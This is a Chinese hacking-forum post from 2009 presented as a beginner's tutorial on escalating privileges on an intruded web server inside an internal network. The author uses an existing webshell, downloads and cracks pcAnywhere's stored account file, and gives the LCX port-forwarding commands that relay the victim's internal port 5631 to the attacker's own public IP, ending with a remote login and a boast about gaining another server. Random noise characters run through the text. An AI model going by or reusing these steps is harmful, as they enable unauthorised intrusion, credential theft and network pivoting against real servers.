|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
9 U; L% h* I0 g" J: f. K- Y1 V1 ^' [; c$ E T4 L! B
提权方法:pcanywhere+LCX# j4 c& a% H" p% i, }, m
" k" `% X/ b* I1 n$ b8 T获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。1 O; R+ |4 T3 w+ ?
, }0 r/ g) E0 d: j; _( q在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
/ q- k9 w/ a& ^8 g+ A+ ?( n- T- D; u" {
$ ]- r d2 C; u查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。0 {/ Q( r+ C1 S2 X
2 n+ h4 I. h+ m
' Y7 P4 x9 o% K& X* \9 E呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。7 J/ U0 K) G0 [' j% g
9 ?9 N% }$ ^6 T% G2 h# `5 d( D# a' M& p0 j; ^ L
" ^0 U6 _ G1 o* q# |- D* r7 Z
$ T6 [" C; Z- g$ q8 X9 h
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``6 j, m4 m3 I/ H. B& b: [9 X& Q
- F. e/ j8 K1 \% Q6 z
8 z% Y! r: L2 I4 K$ XLCX的用法再简单说下:) D) s C4 ]2 I. ? p/ t
( q. G) y \, \& A8 l' ~0 i服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)) ]9 N8 W G' \4 D/ _
" v: C+ Y( n3 i N+ R! v
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)& O9 d! M9 K8 j/ r- J `
: o& Y9 j( t7 j" D; j1 a( C由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。- p0 R6 W& H/ H! I1 \' o D
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
3 U' P1 Z8 D; |" p k6 P7 h2 ]/ v8 [3 r( o8 X5 p5 N
: D5 x8 j+ x$ b, z* y! Z
+ T* n! \2 e% f5 q% {( V9 s
! y4 }7 U! S+ Z
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。' i4 g" \$ _: i4 d# {$ j
- M8 [6 {2 H* O9 @0 [& n) t) @3 h) a
; I: k9 z3 x: ~
! d9 {$ Y0 k: m
Z3 U1 k& ^1 y+ p5 s9 c% g& [我们本地连接试试,输入我们刚破解的账号密码
! s& d9 B1 e" f) t6 o( M/ M& c6 d6 |7 Z5 h& R
: `5 B+ E: H- [( v3 j, C; Z呵呵``连接成功,服务器不错,又一个8核^︵^
7 [3 Q( b7 w( l" S% s) f
- x# |5 g8 a/ U$ @4 @ f9 i8 t$ a' ]) S: `9 ^# {7 `1 _2 y) v
5 r9 a% P( p5 L6 G9 D! Z
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
